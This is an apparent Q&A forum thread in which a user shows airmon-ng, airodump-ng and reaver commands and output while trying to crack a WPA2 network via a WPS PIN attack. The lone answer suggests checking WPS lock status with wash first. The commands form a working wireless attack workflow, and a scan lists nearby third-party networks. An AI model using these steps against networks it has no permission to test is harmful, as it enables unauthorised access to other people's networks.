0

I am using Ubuntu 14.04 LTS.

Wireless Adaptor: Atheros Communications, Inc. AR9271 802.11n

Wireless Driver : Ath9k_htc

Aircrack Version: Aircrack-ng-1.2-Rc1

Reaver Version : Reaver-1.4

(libpcap0.8_1.4.0-2_i386, Sqlite3-dev, and other needed libraries are also Installed)

Problem: When I run the command "airmon-ng start wlan1" It give the following output:

root@legend-N150P:~# airmon-ng start wlan1
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
487 avahi-daemon
489 avahi-daemon
716 NetworkManager
741 wpa_supplicant

PHY Interface   Driver      Chipset

phy0    wlan0       wl      Broadcom Corporation BCM4313 802.11bgn Wireless Network Adapter (rev 01)
phy3    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n
    (mac80211 monitor mode vif enabled for [phy3]wlan1 on [phy3]wlan1mon)
    (mac80211 station mode vif disabled for [phy3]wlan1)

Then I entered the command "airodum-ng wlan1mon" It give the following output:

CH  8 ][ BAT: 2 hours 56 mins ][ Elapsed: 1 min ][ 2015-02-23 08:51                   

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

5C:F9:6A:C4:88:DE  -42      135        1    0   6  54e  WPA2 CCMP   PSK  LEGEND_10    
90:F6:52:F0:56:38  -88       55       12    0  11  54 . OPN              Al-Afzal 2   
02:0C:E7:34:30:5F  -89       15        0    0   1  54e. WPA2 CCMP   PSK  AndroidAP    
2C:E4:12:21:51:14  -91       45        0    0  11  54   WPA2 CCMP   PSK  Usman Ahmad  
BC:98:89:4C:3D:0B  -91        2        0    0   6  54e. WPA2 CCMP   PSK  PTCL-BB      

BSSID              STATION            PWR   Rate    Lost    Frames  Probe              

(not associated)   5C:F9:6A:C4:88:DE  -43    0 - 1      0       28                     
(not associated)   00:1B:B1:EE:9A:DB  -75    0 - 1      0        7                     

Now I want to Hack a Network with ESSID: LEGEND_10... For that I entered the command "Reaver -i wlan1mon -b 5C:F9:6A:C4:88:DE -vv" It give the following output:

root@legend-N150P:~# reaver -i wlan1mon -b 5C:F9:6A:C4:88:DE -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 5C:F9:6A:C4:88:DE
[+] Switching wlan1mon to channel 6
[+] Associated with 5C:F9:6A:C4:88:DE (ESSID: LEGEND_10)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurr
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

What is the problem?

1 Answer 1

0

First check whether the router you want to hack have enable wps or not using this code;

wash -i wlan1mon

If wps lock is "no" then only reaver can crack the password, but if it is locked you cannot use reaver.

You may have different interface instead of "wlan0mon" like wlan0,mon0 etc.

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .